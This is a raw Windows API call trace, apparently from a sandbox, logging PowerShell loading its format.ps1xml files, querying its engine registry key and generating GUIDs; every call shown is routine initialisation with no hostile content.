	[0824.124] ReadFile (in: hFile=0x308, lpBuffer=0x3150118, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd358, lpOverlapped=0x0 | out: lpBuffer=0x3150118*, lpNumberOfBytesRead=0x1cd358*=0x1000, lpOverlapped=0x0) returned 1
	[0824.125] ReadFile (in: hFile=0x308, lpBuffer=0x3150118, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd358, lpOverlapped=0x0 | out: lpBuffer=0x3150118*, lpNumberOfBytesRead=0x1cd358*=0x1000, lpOverlapped=0x0) returned 1
	[0824.125] ReadFile (in: hFile=0x308, lpBuffer=0x3150118, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd358, lpOverlapped=0x0 | out: lpBuffer=0x3150118*, lpNumberOfBytesRead=0x1cd358*=0x1000, lpOverlapped=0x0) returned 1
	[0824.126] ReadFile (in: hFile=0x308, lpBuffer=0x3150118, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd358, lpOverlapped=0x0 | out: lpBuffer=0x3150118*, lpNumberOfBytesRead=0x1cd358*=0x1000, lpOverlapped=0x0) returned 1
	[0824.126] ReadFile (in: hFile=0x308, lpBuffer=0x3150118, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd358, lpOverlapped=0x0 | out: lpBuffer=0x3150118*, lpNumberOfBytesRead=0x1cd358*=0x1000, lpOverlapped=0x0) returned 1
	[0824.126] ReadFile (in: hFile=0x308, lpBuffer=0x3150118, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd358, lpOverlapped=0x0 | out: lpBuffer=0x3150118*, lpNumberOfBytesRead=0x1cd358*=0x1000, lpOverlapped=0x0) returned 1
	[0824.127] ReadFile (in: hFile=0x308, lpBuffer=0x3150118, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd358, lpOverlapped=0x0 | out: lpBuffer=0x3150118*, lpNumberOfBytesRead=0x1cd358*=0xe67, lpOverlapped=0x0) returned 1
	[0824.127] ReadFile (in: hFile=0x308, lpBuffer=0x314f6e7, nNumberOfBytesToRead=0x199, lpNumberOfBytesRead=0x1cd358, lpOverlapped=0x0 | out: lpBuffer=0x314f6e7*, lpNumberOfBytesRead=0x1cd358*=0x0, lpOverlapped=0x0) returned 1
	[0824.127] ReadFile (in: hFile=0x308, lpBuffer=0x3150118, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd358, lpOverlapped=0x0 | out: lpBuffer=0x3150118*, lpNumberOfBytesRead=0x1cd358*=0x0, lpOverlapped=0x0) returned 1
	[0824.127] CloseHandle (hObject=0x308) returned 1
	[0824.128] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellCore.format.ps1xml", nBufferLength=0x105, lpBuffer=0x1cd0a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellCore.format.ps1xml", lpFilePart=0x0) returned 0x47
	[0824.128] SetErrorMode (uMode=0x1) returned 0x1
	[0824.128] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellCore.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\powershellcore.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x1cd300 | out: lpFileInformation=0x1cd300*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67e9dda3, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67e9dda3, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe601915b, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x15e67)) returned 1
	[0824.128] SetErrorMode (uMode=0x1) returned 0x1
	[0824.128] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellCore.format.ps1xml", nBufferLength=0x105, lpBuffer=0x1cd030, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellCore.format.ps1xml", lpFilePart=0x0) returned 0x47
	[0824.128] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x1cd3e8 | out: phkResult=0x1cd3e8*=0x308) returned 0x0
	[0824.129] RegQueryValueExW (in: hKey=0x308, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x1cd36c, lpData=0x0, lpcbData=0x1cd368*=0x0 | out: lpType=0x1cd36c*=0x1, lpData=0x0, lpcbData=0x1cd368*=0x56) returned 0x0
	[0824.129] CoTaskMemAlloc (cb=0x5a) returned 0x1b8ef640
	[0824.129] RegQueryValueExW (in: hKey=0x308, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x1cd33c, lpData=0x1b8ef640, lpcbData=0x1cd338*=0x56 | out: lpType=0x1cd33c*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x1cd338*=0x56) returned 0x0
	[0824.129] CoTaskMemFree (pv=0x1b8ef640) 
	[0824.129] RegCloseKey (hKey=0x308) returned 0x0
	[0824.129] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellCore.format.ps1xml", nBufferLength=0x105, lpBuffer=0x1cd030, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellCore.format.ps1xml", lpFilePart=0x0) returned 0x47
	[0824.129] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellCore.format.ps1xml", nBufferLength=0x105, lpBuffer=0x1ccee0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellCore.format.ps1xml", lpFilePart=0x0) returned 0x47
	[0824.131] CoCreateGuid (in: pguid=0x1cd610 | out: pguid=0x1cd610*(Data1=0xd8903e61, Data2=0xe9eb, Data3=0x4224, Data4=([0]=0xae, [1]=0x7b, [2]=0x53, [3]=0xf, [4]=0x28, [5]=0xe9, [6]=0xfe, [7]=0xd8))) returned 0x0
	[0824.131] CoCreateGuid (in: pguid=0x1cd610 | out: pguid=0x1cd610*(Data1=0xd9a5ac9f, Data2=0xba4b, Data3=0x4982, Data4=([0]=0xa7, [1]=0x62, [2]=0x38, [3]=0xe6, [4]=0x78, [5]=0x91, [6]=0x1c, [7]=0xb6))) returned 0x0
	[0824.131] CoCreateGuid (in: pguid=0x1cd610 | out: pguid=0x1cd610*(Data1=0xc0594230, Data2=0xaed5, Data3=0x4a47, Data4=([0]=0xba, [1]=0xf6, [2]=0xb8, [3]=0x4c, [4]=0x3a, [5]=0x42, [6]=0xb4, [7]=0xde))) returned 0x0
	[0824.131] CoCreateGuid (in: pguid=0x1cd610 | out: pguid=0x1cd610*(Data1=0xe5e1ab93, Data2=0xd40a, Data3=0x4ca2, Data4=([0]=0x9c, [1]=0x19, [2]=0x33, [3]=0x92, [4]=0x8f, [5]=0x56, [6]=0x56, [7]=0x51))) returned 0x0
	[0824.132] CoCreateGuid (in: pguid=0x1cd610 | out: pguid=0x1cd610*(Data1=0x631c0f8, Data2=0xb1b9, Data3=0x4639, Data4=([0]=0xa4, [1]=0xc8, [2]=0xfa, [3]=0xb1, [4]=0x7b, [5]=0x5c, [6]=0x5e, [7]=0x9b))) returned 0x0
	[0824.135] CoCreateGuid (in: pguid=0x1cd610 | out: pguid=0x1cd610*(Data1=0x21e24c67, Data2=0xc7a4, Data3=0x4a95, Data4=([0]=0xab, [1]=0x12, [2]=0xca, [3]=0x52, [4]=0xc7, [5]=0x8c, [6]=0x4d, [7]=0x14))) returned 0x0
	[0824.135] CoCreateGuid (in: pguid=0x1cd610 | out: pguid=0x1cd610*(Data1=0xe97cf13e, Data2=0x3f3c, Data3=0x495a, Data4=([0]=0x8b, [1]=0xf1, [2]=0x40, [3]=0x22, [4]=0x6b, [5]=0x3, [6]=0x3b, [7]=0xed))) returned 0x0
	[0824.135] CoCreateGuid (in: pguid=0x1cd610 | out: pguid=0x1cd610*(Data1=0xc4a2c3b1, Data2=0x7e78, Data3=0x4097, Data4=([0]=0xbf, [1]=0x8, [2]=0xa8, [3]=0xc8, [4]=0xba, [5]=0x93, [6]=0x36, [7]=0xc3))) returned 0x0
	[0827.193] CoCreateGuid (in: pguid=0x1cd610 | out: pguid=0x1cd610*(Data1=0xcd82dcac, Data2=0xcb45, Data3=0x43f0, Data4=([0]=0x80, [1]=0xc1, [2]=0x47, [3]=0x35, [4]=0x82, [5]=0xbf, [6]=0x21, [7]=0x92))) returned 0x0
	[0827.194] CoCreateGuid (in: pguid=0x1cd610 | out: pguid=0x1cd610*(Data1=0x2004e7e4, Data2=0x30f, Data3=0x45aa, Data4=([0]=0x97, [1]=0x71, [2]=0xc1, [3]=0xde, [4]=0xd, [5]=0x77, [6]=0x47, [7]=0x86))) returned 0x0
	[0827.194] CoCreateGuid (in: pguid=0x1cd610 | out: pguid=0x1cd610*(Data1=0x24b469cc, Data2=0x5a36, Data3=0x48e6, Data4=([0]=0x94, [1]=0xa8, [2]=0xe6, [3]=0x91, [4]=0x33, [5]=0x73, [6]=0x4, [7]=0xe6))) returned 0x0
	[0827.194] CoCreateGuid (in: pguid=0x1cd610 | out: pguid=0x1cd610*(Data1=0xb84e5c0b, Data2=0x4a17, Data3=0x472c, Data4=([0]=0xbd, [1]=0x49, [2]=0x15, [3]=0x2b, [4]=0x26, [5]=0x51, [6]=0xaf, [7]=0x78))) returned 0x0
	[0827.194] CoCreateGuid (in: pguid=0x1cd610 | out: pguid=0x1cd610*(Data1=0x6bb475e5, Data2=0x8576, Data3=0x4334, Data4=([0]=0x95, [1]=0xc6, [2]=0x78, [3]=0xbf, [4]=0xc7, [5]=0xae, [6]=0xb4, [7]=0x6f))) returned 0x0
	[0827.194] CoCreateGuid (in: pguid=0x1cd610 | out: pguid=0x1cd610*(Data1=0x3ee40acf, Data2=0xa43f, Data3=0x4809, Data4=([0]=0x9d, [1]=0xdf, [2]=0xed, [3]=0xb1, [4]=0x1a, [5]=0x6a, [6]=0x19, [7]=0xe3))) returned 0x0
	[0827.194] CoCreateGuid (in: pguid=0x1cd610 | out: pguid=0x1cd610*(Data1=0xed3519ce, Data2=0x3595, Data3=0x443d, Data4=([0]=0x90, [1]=0x8e, [2]=0x91, [3]=0xdb, [4]=0xe1, [5]=0xf5, [6]=0x1, [7]=0xe3))) returned 0x0
	[0827.194] CoCreateGuid (in: pguid=0x1cd610 | out: pguid=0x1cd610*(Data1=0x6c31a058, Data2=0xb292, Data3=0x4889, Data4=([0]=0x8f, [1]=0x2a, [2]=0x64, [3]=0x77, [4]=0xe1, [5]=0xab, [6]=0x5e, [7]=0xf4))) returned 0x0
	[0827.194] CoCreateGuid (in: pguid=0x1cd610 | out: pguid=0x1cd610*(Data1=0x3a718aef, Data2=0x3904, Data3=0x49d0, Data4=([0]=0xa7, [1]=0x51, [2]=0x93, [3]=0x2b, [4]=0x77, [5]=0x97, [6]=0xd5, [7]=0xf6))) returned 0x0
	[0827.195] CoCreateGuid (in: pguid=0x1cd610 | out: pguid=0x1cd610*(Data1=0x92759d55, Data2=0xa65e, Data3=0x4468, Data4=([0]=0x9f, [1]=0x3a, [2]=0x43, [3]=0xf5, [4]=0x76, [5]=0x42, [6]=0x88, [7]=0xc9))) returned 0x0
	[0827.195] CoCreateGuid (in: pguid=0x1cd610 | out: pguid=0x1cd610*(Data1=0x81132fd1, Data2=0xcc3a, Data3=0x489f, Data4=([0]=0xb8, [1]=0x49, [2]=0x3e, [3]=0x5b, [4]=0x40, [5]=0x58, [6]=0xaa, [7]=0x42))) returned 0x0
	[0827.195] CoCreateGuid (in: pguid=0x1cd610 | out: pguid=0x1cd610*(Data1=0xb191127a, Data2=0xf3f4, Data3=0x486f, Data4=([0]=0x83, [1]=0xe8, [2]=0xe4, [3]=0xb4, [4]=0x1c, [5]=0x6a, [6]=0x75, [7]=0x64))) returned 0x0
	[0827.195] CoCreateGuid (in: pguid=0x1cd610 | out: pguid=0x1cd610*(Data1=0xa2e10f27, Data2=0x703d, Data3=0x42f0, Data4=([0]=0x8e, [1]=0x99, [2]=0xe6, [3]=0x36, [4]=0x78, [5]=0xb6, [6]=0x2c, [7]=0x94))) returned 0x0
	[0827.195] CoCreateGuid (in: pguid=0x1cd610 | out: pguid=0x1cd610*(Data1=0xa2daed29, Data2=0xb366, Data3=0x4fa9, Data4=([0]=0xae, [1]=0x29, [2]=0x60, [3]=0xd2, [4]=0x90, [5]=0x22, [6]=0xe1, [7]=0x30))) returned 0x0
	[0827.195] CoCreateGuid (in: pguid=0x1cd610 | out: pguid=0x1cd610*(Data1=0xf19ce8e5, Data2=0xa9f0, Data3=0x4094, Data4=([0]=0x8d, [1]=0xa0, [2]=0x4e, [3]=0xd9, [4]=0x7a, [5]=0x57, [6]=0x2b, [7]=0xa7))) returned 0x0
	[0827.195] CoCreateGuid (in: pguid=0x1cd610 | out: pguid=0x1cd610*(Data1=0xaa2b3096, Data2=0xb4ea, Data3=0x488b, Data4=([0]=0x85, [1]=0x18, [2]=0x35, [3]=0x13, [4]=0xa8, [5]=0xee, [6]=0x93, [7]=0x77))) returned 0x0
	[0827.196] CoCreateGuid (in: pguid=0x1cd610 | out: pguid=0x1cd610*(Data1=0x55c53e8d, Data2=0x15ab, Data3=0x4a17, Data4=([0]=0xaa, [1]=0xaf, [2]=0xc, [3]=0x82, [4]=0x8c, [5]=0x33, [6]=0x79, [7]=0x2))) returned 0x0
	[0827.196] CoCreateGuid (in: pguid=0x1cd610 | out: pguid=0x1cd610*(Data1=0x5fd9538, Data2=0xb6fb, Data3=0x481e, Data4=([0]=0x87, [1]=0xa1, [2]=0x9b, [3]=0xd6, [4]=0x64, [5]=0xcc, [6]=0x9, [7]=0xc3))) returned 0x0
	[0827.196] CoCreateGuid (in: pguid=0x1cd610 | out: pguid=0x1cd610*(Data1=0xd499e1d2, Data2=0x1174, Data3=0x4f7d, Data4=([0]=0x80, [1]=0xfa, [2]=0x63, [3]=0x1d, [4]=0x44, [5]=0xf8, [6]=0x1f, [7]=0x8d))) returned 0x0
	[0827.196] CoCreateGuid (in: pguid=0x1cd610 | out: pguid=0x1cd610*(Data1=0xf2981f2c, Data2=0x2988, Data3=0x4c63, Data4=([0]=0x8f, [1]=0x26, [2]=0x62, [3]=0x65, [4]=0xf6, [5]=0xbb, [6]=0xb1, [7]=0x3b))) returned 0x0
	[0827.196] CoCreateGuid (in: pguid=0x1cd610 | out: pguid=0x1cd610*(Data1=0x17dabd94, Data2=0xa72, Data3=0x4f3e, Data4=([0]=0xbb, [1]=0xf7, [2]=0x20, [3]=0xd3, [4]=0x1, [5]=0x91, [6]=0x82, [7]=0xea))) returned 0x0
	[0827.196] CoCreateGuid (in: pguid=0x1cd610 | out: pguid=0x1cd610*(Data1=0x6397ed74, Data2=0x5cf9, Data3=0x47d0, Data4=([0]=0xb7, [1]=0xfc, [2]=0xdb, [3]=0x6a, [4]=0xcc, [5]=0x51, [6]=0xcf, [7]=0x44))) returned 0x0
	[0827.196] CoCreateGuid (in: pguid=0x1cd610 | out: pguid=0x1cd610*(Data1=0x1015f556, Data2=0x9935, Data3=0x4471, Data4=([0]=0xab, [1]=0x2a, [2]=0x5, [3]=0x85, [4]=0xf7, [5]=0xfe, [6]=0xfd, [7]=0x42))) returned 0x0
	[0827.196] CoCreateGuid (in: pguid=0x1cd610 | out: pguid=0x1cd610*(Data1=0xb73a9477, Data2=0xed8c, Data3=0x4e36, Data4=([0]=0x89, [1]=0x3b, [2]=0x76, [3]=0xf, [4]=0xb, [5]=0x24, [6]=0xde, [7]=0x51))) returned 0x0
	[0827.197] CoCreateGuid (in: pguid=0x1cd610 | out: pguid=0x1cd610*(Data1=0xbdb2e072, Data2=0x1d39, Data3=0x4baf, Data4=([0]=0xb2, [1]=0xf9, [2]=0x51, [3]=0xbb, [4]=0xa3, [5]=0xe7, [6]=0xde, [7]=0xf2))) returned 0x0
	[0827.198] CoCreateGuid (in: pguid=0x1cd610 | out: pguid=0x1cd610*(Data1=0x9cb93815, Data2=0xfcf, Data3=0x4f34, Data4=([0]=0xb3, [1]=0xb2, [2]=0xa7, [3]=0x1a, [4]=0x6a, [5]=0x5, [6]=0x22, [7]=0x6a))) returned 0x0
	[0827.198] CoCreateGuid (in: pguid=0x1cd610 | out: pguid=0x1cd610*(Data1=0x7f3f9e00, Data2=0x78cf, Data3=0x4279, Data4=([0]=0x81, [1]=0xd4, [2]=0xe1, [3]=0xca, [4]=0x4a, [5]=0x44, [6]=0x16, [7]=0x25))) returned 0x0
	[0827.198] CoCreateGuid (in: pguid=0x1cd610 | out: pguid=0x1cd610*(Data1=0x7d33654c, Data2=0xf81f, Data3=0x413d, Data4=([0]=0x80, [1]=0x68, [2]=0xf1, [3]=0x75, [4]=0x69, [5]=0x36, [6]=0xf2, [7]=0x3a))) returned 0x0
	[0827.198] CoCreateGuid (in: pguid=0x1cd610 | out: pguid=0x1cd610*(Data1=0xc4b32cf1, Data2=0x45b7, Data3=0x4b1f, Data4=([0]=0xb9, [1]=0x42, [2]=0x95, [3]=0x74, [4]=0x2c, [5]=0x9d, [6]=0xca, [7]=0x57))) returned 0x0
	[0827.198] CoCreateGuid (in: pguid=0x1cd610 | out: pguid=0x1cd610*(Data1=0xe6e8c004, Data2=0x98f2, Data3=0x4de7, Data4=([0]=0x9c, [1]=0xd1, [2]=0x56, [3]=0x75, [4]=0x29, [5]=0xf1, [6]=0x84, [7]=0xda))) returned 0x0
	[0827.199] CoCreateGuid (in: pguid=0x1cd610 | out: pguid=0x1cd610*(Data1=0x472f7c5b, Data2=0x5c59, Data3=0x497f, Data4=([0]=0xa3, [1]=0x82, [2]=0xd4, [3]=0x16, [4]=0x8b, [5]=0x3c, [6]=0x62, [7]=0xf3))) returned 0x0
	[0827.199] CoCreateGuid (in: pguid=0x1cd610 | out: pguid=0x1cd610*(Data1=0x96b5708d, Data2=0x8f4d, Data3=0x4868, Data4=([0]=0xb3, [1]=0x2a, [2]=0x76, [3]=0x5, [4]=0x3, [5]=0x14, [6]=0x23, [7]=0x23))) returned 0x0
	[0827.199] CoCreateGuid (in: pguid=0x1cd610 | out: pguid=0x1cd610*(Data1=0x24415830, Data2=0x6348, Data3=0x4ea6, Data4=([0]=0xbf, [1]=0xbf, [2]=0x6c, [3]=0xb2, [4]=0x4, [5]=0xe8, [6]=0xb4, [7]=0xe7))) returned 0x0
	[0827.199] CoCreateGuid (in: pguid=0x1cd610 | out: pguid=0x1cd610*(Data1=0xe039e605, Data2=0xbb54, Data3=0x42b8, Data4=([0]=0x81, [1]=0xfd, [2]=0xab, [3]=0x1c, [4]=0xeb, [5]=0x31, [6]=0xe9, [7]=0xbb))) returned 0x0
	[0827.199] CoCreateGuid (in: pguid=0x1cd610 | out: pguid=0x1cd610*(Data1=0xcfec8381, Data2=0xc6c2, Data3=0x4276, Data4=([0]=0x99, [1]=0x35, [2]=0x9f, [3]=0x33, [4]=0xff, [5]=0x59, [6]=0x89, [7]=0x3))) returned 0x0
	[0827.199] CoCreateGuid (in: pguid=0x1cd610 | out: pguid=0x1cd610*(Data1=0xe01e2c15, Data2=0x9c6b, Data3=0x4ed1, Data4=([0]=0x95, [1]=0xf4, [2]=0x9a, [3]=0xdb, [4]=0x4b, [5]=0xbe, [6]=0xbb, [7]=0xda))) returned 0x0
	[0827.200] CoCreateGuid (in: pguid=0x1cd610 | out: pguid=0x1cd610*(Data1=0xf9b72c91, Data2=0x28bf, Data3=0x48b4, Data4=([0]=0xba, [1]=0xb9, [2]=0xae, [3]=0xbe, [4]=0x7d, [5]=0xb7, [6]=0x0, [7]=0x9c))) returned 0x0
	[0827.200] CoCreateGuid (in: pguid=0x1cd610 | out: pguid=0x1cd610*(Data1=0xff24aa80, Data2=0xe7d4, Data3=0x4c2e, Data4=([0]=0xbc, [1]=0xac, [2]=0x1b, [3]=0xc8, [4]=0xdc, [5]=0xc7, [6]=0xd7, [7]=0x2f))) returned 0x0
	[0827.200] CoCreateGuid (in: pguid=0x1cd610 | out: pguid=0x1cd610*(Data1=0x18077141, Data2=0x2247, Data3=0x4260, Data4=([0]=0x85, [1]=0x9, [2]=0x36, [3]=0x9c, [4]=0x24, [5]=0xa8, [6]=0xa2, [7]=0xd5))) returned 0x0
	[0827.200] CoCreateGuid (in: pguid=0x1cd610 | out: pguid=0x1cd610*(Data1=0xce8eb052, Data2=0x9013, Data3=0x475e, Data4=([0]=0xbc, [1]=0x1c, [2]=0x10, [3]=0x80, [4]=0x49, [5]=0x6a, [6]=0x2e, [7]=0x8d))) returned 0x0
	[0827.200] CreateFileW (lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellTrace.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\powershelltrace.format.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x308
	[0827.201] GetFileType (hFile=0x308) returned 0x1
	[0827.201] SetErrorMode (uMode=0x1) returned 0x1
	[0827.201] GetFileType (hFile=0x308) returned 0x1
	[0827.201] ReadFile (in: hFile=0x308, lpBuffer=0x32ae0b0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd358, lpOverlapped=0x0 | out: lpBuffer=0x32ae0b0*, lpNumberOfBytesRead=0x1cd358*=0x1000, lpOverlapped=0x0) returned 1
	[0827.202] ReadFile (in: hFile=0x308, lpBuffer=0x32ae0b0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd358, lpOverlapped=0x0 | out: lpBuffer=0x32ae0b0*, lpNumberOfBytesRead=0x1cd358*=0x1000, lpOverlapped=0x0) returned 1
	[0827.202] ReadFile (in: hFile=0x308, lpBuffer=0x32ae0b0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd358, lpOverlapped=0x0 | out: lpBuffer=0x32ae0b0*, lpNumberOfBytesRead=0x1cd358*=0x1000, lpOverlapped=0x0) returned 1
	[0827.202] ReadFile (in: hFile=0x308, lpBuffer=0x32ae0b0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd358, lpOverlapped=0x0 | out: lpBuffer=0x32ae0b0*, lpNumberOfBytesRead=0x1cd358*=0x1000, lpOverlapped=0x0) returned 1
	[0827.211] ReadFile (in: hFile=0x308, lpBuffer=0x2f20860, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd358, lpOverlapped=0x0 | out: lpBuffer=0x2f20860*, lpNumberOfBytesRead=0x1cd358*=0x8b4, lpOverlapped=0x0) returned 1
	[0827.211] ReadFile (in: hFile=0x308, lpBuffer=0x2f204d4, nNumberOfBytesToRead=0x34c, lpNumberOfBytesRead=0x1cd358, lpOverlapped=0x0 | out: lpBuffer=0x2f204d4*, lpNumberOfBytesRead=0x1cd358*=0x0, lpOverlapped=0x0) returned 1
	[0827.211] ReadFile (in: hFile=0x308, lpBuffer=0x2f20860, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd358, lpOverlapped=0x0 | out: lpBuffer=0x2f20860*, lpNumberOfBytesRead=0x1cd358*=0x0, lpOverlapped=0x0) returned 1
	[0827.211] CloseHandle (hObject=0x308) returned 1
	[0827.211] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellTrace.format.ps1xml", nBufferLength=0x105, lpBuffer=0x1cd0a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellTrace.format.ps1xml", lpFilePart=0x0) returned 0x48
	[0827.211] SetErrorMode (uMode=0x1) returned 0x1
	[0827.212] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellTrace.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\powershelltrace.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x1cd300 | out: lpFileInformation=0x1cd300*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67eea05d, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67eea05d, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe601915b, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x48b4)) returned 1
	[0827.212] SetErrorMode (uMode=0x1) returned 0x1
	[0827.212] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellTrace.format.ps1xml", nBufferLength=0x105, lpBuffer=0x1cd030, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellTrace.format.ps1xml", lpFilePart=0x0) returned 0x48
	[0827.212] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x1cd3e8 | out: phkResult=0x1cd3e8*=0x308) returned 0x0
	[0827.212] RegQueryValueExW (in: hKey=0x308, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x1cd36c, lpData=0x0, lpcbData=0x1cd368*=0x0 | out: lpType=0x1cd36c*=0x1, lpData=0x0, lpcbData=0x1cd368*=0x56) returned 0x0
	[0827.212] CoTaskMemAlloc (cb=0x5a) returned 0x1b8ef640
	[0827.212] RegQueryValueExW (in: hKey=0x308, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x1cd33c, lpData=0x1b8ef640, lpcbData=0x1cd338*=0x56 | out: lpType=0x1cd33c*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x1cd338*=0x56) returned 0x0
	[0827.212] CoTaskMemFree (pv=0x1b8ef640) 
	[0827.212] RegCloseKey (hKey=0x308) returned 0x0
	[0827.212] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellTrace.format.ps1xml", nBufferLength=0x105, lpBuffer=0x1cd030, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellTrace.format.ps1xml", lpFilePart=0x0) returned 0x48
	[0827.213] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellTrace.format.ps1xml", nBufferLength=0x105, lpBuffer=0x1ccee0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellTrace.format.ps1xml", lpFilePart=0x0) returned 0x48
	[0827.213] CoCreateGuid (in: pguid=0x1cd610 | out: pguid=0x1cd610*(Data1=0x91c366bf, Data2=0x45b9, Data3=0x408d, Data4=([0]=0x93, [1]=0xe2, [2]=0x3a, [3]=0xc3, [4]=0xae, [5]=0xbd, [6]=0x14, [7]=0xe0))) returned 0x0
	[0827.214] CoCreateGuid (in: pguid=0x1cd610 | out: pguid=0x1cd610*(Data1=0x1df025ec, Data2=0xcc08, Data3=0x452f, Data4=([0]=0xa8, [1]=0x25, [2]=0xb2, [3]=0x91, [4]=0xdd, [5]=0x73, [6]=0xa7, [7]=0x1a))) returned 0x0
	[0827.215] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Registry.format.ps1xml", nBufferLength=0x105, lpBuffer=0x1ccdd0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Registry.format.ps1xml", lpFilePart=0x0) returned 0x41
	[0827.215] SetErrorMode (uMode=0x1) returned 0x1
	[0827.215] CreateFileW (lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Registry.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\registry.format.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x308
	[0827.215] GetFileType (hFile=0x308) returned 0x1
	[0827.215] SetErrorMode (uMode=0x1) returned 0x1
	[0827.215] GetFileType (hFile=0x308) returned 0x1
	[0827.215] ReadFile (in: hFile=0x308, lpBuffer=0x2f57360, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd358, lpOverlapped=0x0 | out: lpBuffer=0x2f57360*, lpNumberOfBytesRead=0x1cd358*=0x1000, lpOverlapped=0x0) returned 1
	[0827.216] ReadFile (in: hFile=0x308, lpBuffer=0x2f57360, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd358, lpOverlapped=0x0 | out: lpBuffer=0x2f57360*, lpNumberOfBytesRead=0x1cd358*=0x1000, lpOverlapped=0x0) returned 1
	[0827.216] ReadFile (in: hFile=0x308, lpBuffer=0x2f57360, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd358, lpOverlapped=0x0 | out: lpBuffer=0x2f57360*, lpNumberOfBytesRead=0x1cd358*=0x1000, lpOverlapped=0x0) returned 1
